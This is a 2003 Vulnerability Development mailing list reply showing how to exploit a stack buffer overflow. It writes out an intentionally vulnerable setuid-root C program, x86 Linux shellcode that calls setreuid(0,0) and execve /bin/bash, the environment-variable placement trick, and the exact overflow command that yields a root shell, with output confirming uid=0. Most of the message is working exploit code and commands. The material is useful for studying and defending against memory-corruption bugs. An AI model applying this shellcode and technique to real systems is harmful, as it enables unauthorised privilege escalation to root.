Vulnerability Development mailing list archives
Re: controlling ebp/eip of a frame, does it always lead to possible code execution?
From: Steven Hill <steve () covertsystems org>
Date: Fri, 19 Sep 2003 16:00:12 +1000 (EST)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Thu, 18 Sep 2003, Ingram wrote:
hello, again i have a little question about buffer overflows, that i could not figure out by myself. If i can control what is written to ebp and eip, i thought that this always would be enough to execute shellcode, ...it seems not:./exploitSegmentation fault (core dumped)gdb ./myprog ./myprog.core
Ingram, Try these sample exploit commandline statements, as it should help you better understand what you are trying to achieve, then if you prefer, browse over the attached exploit code. [steve@covertsystems research]#cat > vuln.c <EOF #include <stdio.h> #include <string.h> #include <stdlib.h> int main(int argc, char **argv) { char buffer[1024]; if(argc > 1) strcpy(buffer, argv[1]); return EXIT_SUCCESS; } EOF [steve@covertsystems research]#cat > shell2string.c << EOF #include <stdio.h> #include <stdlib.h> char shell[] = //setreuid(0, 0); "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80" //execve("/bin/bash", NULL) "\x31\xc0\x50\x6a\x68\x68\x2f\x62\x61\x73" "\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24" "\x0c\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80" //exit(0); "x31\xc0\xb0\x01\xcd\x80"; int main(void) { FILE *fp; int x; fp = fopen("shell.txt", "wb"); for(x = 0; x < strlen(shell); x++) fprintf(fp, "%c", shell[x]); fclose(fp); return EXIT_SUCCESS; } EOF [steve@covertsystems research]$ gcc shell2string.c [steve@covertsystems research]$ ./a.out [steve@covertsystems research]$ ls -l shell.txt ; wc -c shell.txt - -rw-rw-r-- 1 steve steve 48 Aug 7 18:32 shell.txt 48 shell.txt [steve@covertsystems research]$ od -ch shell.txt 0000000 1 300 260 F 1 333 1 311 315 200 1 300 P j h h c031 46b0 db31 c931 80cd c031 6a50 6868 0000020 / b a s h / b i n 211 343 215 T $ \f P 622f 7361 2f68 6962 896e 8de3 2454 500c 0000040 S 215 \f $ 260 \v 315 200 x 3 1 300 260 001 315 200 8d53 240c 0bb0 80cd 3378 c031 01b0 80cd 0000060 [steve@covertsystems research]# sudo gcc vuln.c -o vuln [steve@covertsystems research]# sudo chown root.root vuln [steve@covertsystems research]# sudo chmod 4755 vuln [steve@covertsystems research]# ls -l vuln - -rwsr-xr-x 1 root root 11549 Aug 7 18:30 vuln [steve@covertsystems research]$ export CODE=`cat shell.txt ` [steve@covertsystems research]$ echo 'main(){printf("%p\n",getenv("CODE"));}'> code.c ; gcc code.c -o code ; ./code ; rm -rf code* 0xbfffff84 [steve@covertsystems research]$ ./vuln `perl -e '{print "A" x 1036}';``printf "\x84\xff\xff\xbf";` No value for $TERM and no -T specified No value for $TERM and no -T specified [root@covertsystems research]# id uid=0(root) gid=500(steve) groups=500(steve) [root@covertsystems research]# Happy Hacking!... 1036 == 1024 + 8[padding] + 4[EBP] +4[EIP] EIP shall point directly to the shellcode ENV address... [steve@covertsystems research-1]$ gcc --version gcc (GCC) 3.2.2 20030222 (Red Hat Linux 3.2.2-5) - -- ---=[ Covert Systems Research ]=-----------------------------// = www.covertsystems.org - = Exploit Research & Development - = Specializing in Linux & UNIX Systems - --------------------------------------------=[ SolarIce ]=---// --The more one reads & learns, the less the other person knows. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQE/apt1+SI9HWArYE4RAkUZAJoDHN4zfMnIqeGohvvjG+rm/MKpzQCdHOqI qd6e7QwZcCZVOrDuTHo/Hco= =7uzm -----END PGP SIGNATURE-----
Attachment:
shell2string.c
Description:
Attachment:
vuln-1.c
Description:
Attachment:
exploit-1-1.c
Description:
Current thread:
- controlling ebp/eip of a frame, does it always lead to possible code execution? Ingram (Sep 18)
- Re: controlling ebp/eip of a frame, does it always lead to possible code execution? Steven Hill (Sep 19)
- <Possible follow-ups>
- Re: controlling ebp/eip of a frame, does it always lead to possible code execution? Ingram (Sep 18)
- Re: controlling ebp/eip of a frame, does it always lead to possible code execution? deepcode . (Sep 18)
- RE: controlling ebp/eip of a frame, does it always lead to possible code execution? Fisch, Matthew (Sep 22)